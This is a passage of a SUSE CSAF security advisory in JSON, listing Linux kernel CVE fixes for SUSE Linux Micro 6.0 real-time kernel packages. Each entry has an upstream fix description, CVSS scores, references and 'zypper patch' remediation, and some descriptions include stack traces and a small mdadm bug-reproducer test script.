"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53768",
"url": "https://www.suse.com/security/cve/CVE-2023-53768"
},
{
"category": "external",
"summary": "SUSE Bug 1254599 for CVE-2023-53768",
"url": "https://bugzilla.suse.com/1254599"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-53768"
},
{
"cve": "CVE-2023-53777",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53777"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nerofs: kill hooked chains to avoid loops on deduplicated compressed images\n\nAfter heavily stressing EROFS with several images which include a\nhand-crafted image of repeated patterns for more than 46 days, I found\ntwo chains could be linked with each other almost simultaneously and\nform a loop so that the entire loop won\u0027t be submitted. As a\nconsequence, the corresponding file pages will remain locked forever.\n\nIt can be _only_ observed on data-deduplicated compressed images.\nFor example, consider two chains with five pclusters in total:\n\tChain 1: 2-\u003e3-\u003e4-\u003e5 -- The tail pcluster is 5;\n Chain 2: 5-\u003e1-\u003e2 -- The tail pcluster is 2.\n\nChain 2 could link to Chain 1 with pcluster 5; and Chain 1 could link\nto Chain 2 at the same time with pcluster 2.\n\nSince hooked chains are all linked locklessly now, I have no idea how\nto simply avoid the race. Instead, let\u0027s avoid hooked chains completely\nuntil I could work out a proper way to fix this and end users finally\ntell us that it\u0027s needed to add it back.\n\nActually, this optimization can be found with multi-threaded workloads\n(especially even more often on deduplicated compressed images), yet I\u0027m\nnot sure about the overall system impacts of not having this compared\nwith implementation complexity.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53777",
"url": "https://www.suse.com/security/cve/CVE-2023-53777"
},
{
"category": "external",
"summary": "SUSE Bug 1254749 for CVE-2023-53777",
"url": "https://bugzilla.suse.com/1254749"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-53777"
},
{
"cve": "CVE-2023-53778",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53778"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\naccel/qaic: Clean up integer overflow checking in map_user_pages()\n\nThe encode_dma() function has some validation on in_trans-\u003esize but it\nwould be more clear to move those checks to find_and_map_user_pages().\n\nThe encode_dma() had two checks:\n\n\tif (in_trans-\u003eaddr + in_trans-\u003esize \u003c in_trans-\u003eaddr || !in_trans-\u003esize)\n\t\treturn -EINVAL;\n\nThe in_trans-\u003eaddr variable is the starting address. The in_trans-\u003esize\nvariable is the total size of the transfer. The transfer can occur in\nparts and the resources-\u003exferred_dma_size tracks how many bytes we have\nalready transferred.\n\nThis patch introduces a new variable \"remaining\" which represents the\namount we want to transfer (in_trans-\u003esize) minus the amount we have\nalready transferred (resources-\u003exferred_dma_size).\n\nI have modified the check for if in_trans-\u003esize is zero to instead check\nif in_trans-\u003esize is less than resources-\u003exferred_dma_size. If we have\nalready transferred more bytes than in_trans-\u003esize then there are negative\nbytes remaining which doesn\u0027t make sense. If there are zero bytes\nremaining to be copied, just return success.\n\nThe check in encode_dma() checked that \"addr + size\" could not overflow\nand barring a driver bug that should work, but it\u0027s easier to check if\nwe do this in parts. First check that \"in_trans-\u003eaddr +\nresources-\u003exferred_dma_size\" is safe. Then check that \"xfer_start_addr +\nremaining\" is safe.\n\nMy final concern was that we are dealing with u64 values but on 32bit\nsystems the kmalloc() function will truncate the sizes to 32 bits. So\nI calculated \"total = in_trans-\u003esize + offset_in_page(xfer_start_addr);\"\nand returned -EINVAL if it were \u003e= SIZE_MAX. This will not affect 64bit\nsystems.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53778",
"url": "https://www.suse.com/security/cve/CVE-2023-53778"
},
{
"category": "external",
"summary": "SUSE Bug 1254761 for CVE-2023-53778",
"url": "https://bugzilla.suse.com/1254761"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-53778"
},
{
"cve": "CVE-2023-53782",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53782"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndccp: Fix out of bounds access in DCCP error handler\n\nThere was a previous attempt to fix an out-of-bounds access in the DCCP\nerror handlers, but that fix assumed that the error handlers only want\nto access the first 8 bytes of the DCCP header. Actually, they also look\nat the DCCP sequence number, which is stored beyond 8 bytes, so an\nexplicit pskb_may_pull() is required.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53782",
"url": "https://www.suse.com/security/cve/CVE-2023-53782"
},
{
"category": "external",
"summary": "SUSE Bug 1254758 for CVE-2023-53782",
"url": "https://bugzilla.suse.com/1254758"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-53782"
},
{
"cve": "CVE-2023-53784",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53784"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm: bridge: dw_hdmi: fix connector access for scdc\n\nCommit 5d844091f237 (\"drm/scdc-helper: Pimp SCDC debugs\") changed the scdc\ninterface to pick up an i2c adapter from a connector instead. However, in\nthe case of dw-hdmi, the wrong connector was being used to pass i2c adapter\ninformation, since dw-hdmi\u0027s embedded connector structure is only populated\nwhen the bridge attachment callback explicitly asks for it.\n\ndrm-meson is handling connector creation, so this won\u0027t happen, leading to\na NULL pointer dereference.\n\nFix it by having scdc functions access dw-hdmi\u0027s current connector pointer\ninstead, which is assigned during the bridge enablement stage.\n\n[narmstrong: moved Fixes tag before first S-o-b and added Reported-by tag]",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53784",
"url": "https://www.suse.com/security/cve/CVE-2023-53784"
},
{
"category": "external",
"summary": "SUSE Bug 1254765 for CVE-2023-53784",
"url": "https://bugzilla.suse.com/1254765"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-53784"
},
{
"cve": "CVE-2023-53785",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53785"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmt76: mt7921: don\u0027t assume adequate headroom for SDIO headers\n\nmt7921_usb_sdio_tx_prepare_skb() calls mt7921_usb_sdio_write_txwi() and\nmt7921_skb_add_usb_sdio_hdr(), both of which blindly assume that\nadequate headroom will be available in the passed skb. This assumption\ntypically is satisfied when the skb was allocated in the net core for\ntransmission via the mt7921 netdev (although even that is only an\noptimization and is not strictly guaranteed), but the assumption is\nsometimes not satisfied when the skb originated in the receive path of\nanother netdev and was passed through to the mt7921, such as by the\nbridge layer. Blindly prepending bytes to an skb is always wrong.\n\nThis commit introduces a call to skb_cow_head() before the call to\nmt7921_usb_sdio_write_txwi() in mt7921_usb_sdio_tx_prepare_skb() to\nensure that at least MT_SDIO_TXD_SIZE + MT_SDIO_HDR_SIZE bytes can be\npushed onto the skb.\n\nWithout this fix, I can trivially cause kernel panics by bridging an\nMT7921AU-based USB 802.11ax interface with an Ethernet interface on an\nIntel Atom-based x86 system using its onboard RTL8169 PCI Ethernet\nadapter and also on an ARM-based Raspberry Pi 1 using its onboard\nSMSC9512 USB Ethernet adapter. Note that the panics do not occur in\nevery system configuration, as they occur only if the receiving netdev\nleaves less headroom in its received skbs than the mt7921 needs for its\nSDIO headers.\n\nHere is an example stack trace of this panic on Raspberry Pi OS Lite\n2023-02-21 running kernel 6.1.24+ [1]:\n\n skb_panic from skb_push+0x44/0x48\n skb_push from mt7921_usb_sdio_tx_prepare_skb+0xd4/0x190 [mt7921_common]\n mt7921_usb_sdio_tx_prepare_skb [mt7921_common] from mt76u_tx_queue_skb+0x94/0x1d0 [mt76_usb]\n mt76u_tx_queue_skb [mt76_usb] from __mt76_tx_queue_skb+0x4c/0xc8 [mt76]\n __mt76_tx_queue_skb [mt76] from mt76_txq_schedule.part.0+0x13c/0x398 [mt76]\n mt76_txq_schedule.part.0 [mt76] from mt76_txq_schedule_all+0x24/0x30 [mt76]\n mt76_txq_schedule_all [mt76] from mt7921_tx_worker+0x58/0xf4 [mt7921_common]\n mt7921_tx_worker [mt7921_common] from __mt76_worker_fn+0x9c/0xec [mt76]\n __mt76_worker_fn [mt76] from kthread+0xbc/0xe0\n kthread from ret_from_fork+0x14/0x34\n\nAfter this fix, bridging the mt7921 interface works fine on both of my\npreviously problematic systems.\n\n[1] https://github.com/raspberrypi/firmware/tree/5c276f55a4b21345cd4d6200a504ee991851ff7a",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53785",
"url": "https://www.suse.com/security/cve/CVE-2023-53785"
},
{
"category": "external",
"summary": "SUSE Bug 1254918 for CVE-2023-53785",
"url": "https://bugzilla.suse.com/1254918"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-53785"
},
{
"cve": "CVE-2023-53787",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53787"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nregulator: da9063: fix null pointer deref with partial DT config\n\nWhen some of the da9063 regulators do not have corresponding DT nodes\na null pointer dereference occurs on boot because such regulators have\nno init_data causing the pointers calculated in\nda9063_check_xvp_constraints() to be invalid.\n\nDo not dereference them in this case.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53787",
"url": "https://www.suse.com/security/cve/CVE-2023-53787"
},
{
"category": "external",
"summary": "SUSE Bug 1254750 for CVE-2023-53787",
"url": "https://bugzilla.suse.com/1254750"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-53787"
},
{
"cve": "CVE-2023-53791",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53791"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmd: fix warning for holder mismatch from export_rdev()\n\nCommit a1d767191096 (\"md: use mddev-\u003eexternal to select holder in\nexport_rdev()\") fix the problem that \u0027claim_rdev\u0027 is used for\nblkdev_get_by_dev() while \u0027rdev\u0027 is used for blkdev_put().\n\nHowever, if mddev-\u003eexternal is changed from 0 to 1, then \u0027rdev\u0027 is used\nfor blkdev_get_by_dev() while \u0027claim_rdev\u0027 is used for blkdev_put(). And\nthis problem can be reporduced reliably by following:\n\nNew file: mdadm/tests/23rdev-lifetime\n\ndevname=${dev0##*/}\ndevt=`cat /sys/block/$devname/dev`\npid=\"\"\nruntime=2\n\nclean_up_test() {\n pill -9 $pid\n echo clear \u003e /sys/block/md0/md/array_state\n}\n\ntrap \u0027clean_up_test\u0027 EXIT\n\nadd_by_sysfs() {\n while true; do\n echo $devt \u003e /sys/block/md0/md/new_dev\n done\n}\n\nremove_by_sysfs(){\n while true; do\n echo remove \u003e /sys/block/md0/md/dev-${devname}/state\n done\n}\n\necho md0 \u003e /sys/module/md_mod/parameters/new_array || die \"create md0 failed\"\n\nadd_by_sysfs \u0026\npid=\"$pid $!\"\n\nremove_by_sysfs \u0026\npid=\"$pid $!\"\n\nsleep $runtime\nexit 0\n\nTest cmd:\n\n./test --save-logs --logdir=/tmp/ --keep-going --dev=loop --tests=23rdev-lifetime\n\nTest result:\n\n------------[ cut here ]------------\nWARNING: CPU: 0 PID: 960 at block/bdev.c:618 blkdev_put+0x27c/0x330\nModules linked in: multipath md_mod loop\nCPU: 0 PID: 960 Comm: test Not tainted 6.5.0-rc2-00121-g01e55c376936-dirty #50\nRIP: 0010:blkdev_put+0x27c/0x330\nCall Trace:\n \u003cTASK\u003e\n export_rdev.isra.23+0x50/0xa0 [md_mod]\n mddev_unlock+0x19d/0x300 [md_mod]\n rdev_attr_store+0xec/0x190 [md_mod]\n sysfs_kf_write+0x52/0x70\n kernfs_fop_write_iter+0x19a/0x2a0\n vfs_write+0x3b5/0x770\n ksys_write+0x74/0x150\n __x64_sys_write+0x22/0x30\n do_syscall_64+0x40/0x90\n entry_SYSCALL_64_after_hwframe+0x63/0xcd\n\nFix the problem by recording if \u0027rdev\u0027 is used as holder.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53791",
"url": "https://www.suse.com/security/cve/CVE-2023-53791"
},
{
"category": "external",
"summary": "SUSE Bug 1254742 for CVE-2023-53791",
"url": "https://bugzilla.suse.com/1254742"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-53791"
},
{
"cve": "CVE-2023-53792",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53792"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnvme-core: fix memory leak in dhchap_ctrl_secret\n\nFree dhchap_secret in nvme_ctrl_dhchap_ctrl_secret_store() before we\nreturn when nvme_auth_generate_key() returns error.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53792",
"url": "https://www.suse.com/security/cve/CVE-2023-53792"
},
{
"category": "external",
"summary": "SUSE Bug 1254743 for CVE-2023-53792",
"url": "https://bugzilla.suse.com/1254743"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-53792"
},
{
"cve": "CVE-2023-53793",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53793"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nperf tool x86: Fix perf_env memory leak\n\nFound by leak sanitizer:\n```\n==1632594==ERROR: LeakSanitizer: detected memory leaks\n\nDirect leak of 21 byte(s) in 1 object(s) allocated from:\n #0 0x7f2953a7077b in __interceptor_strdup ../../../../src/libsanitizer/asan/asan_interceptors.cpp:439\n #1 0x556701d6fbbf in perf_env__read_cpuid util/env.c:369\n #2 0x556701d70589 in perf_env__cpuid util/env.c:465\n #3 0x55670204bba2 in x86__is_amd_cpu arch/x86/util/env.c:14\n #4 0x5567020487a2 in arch__post_evsel_config arch/x86/util/evsel.c:83\n #5 0x556701d8f78b in evsel__config util/evsel.c:1366\n #6 0x556701ef5872 in evlist__config util/record.c:108\n #7 0x556701cd6bcd in test__PERF_RECORD tests/perf-record.c:112\n #8 0x556701cacd07 in run_test tests/builtin-test.c:236\n #9 0x556701cacfac in test_and_print tests/builtin-test.c:265\n #10 0x556701cadddb in __cmd_test tests/builtin-test.c:402\n #11 0x556701caf2aa in cmd_test tests/builtin-test.c:559\n #12 0x556701d3b557 in run_builtin tools/perf/perf.c:323\n #13 0x556701d3bac8 in handle_internal_command tools/perf/perf.c:377\n #14 0x556701d3be90 in run_argv tools/perf/perf.c:421\n #15 0x556701d3c3f8 in main tools/perf/perf.c:537\n #16 0x7f2952a46189 in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58\n\nSUMMARY: AddressSanitizer: 21 byte(s) leaked in 1 allocation(s).\n```",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53793",
"url": "https://www.suse.com/security/cve/CVE-2023-53793"
},
{
"category": "external",
"summary": "SUSE Bug 1254739 for CVE-2023-53793",
"url": "https://bugzilla.suse.com/1254739"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
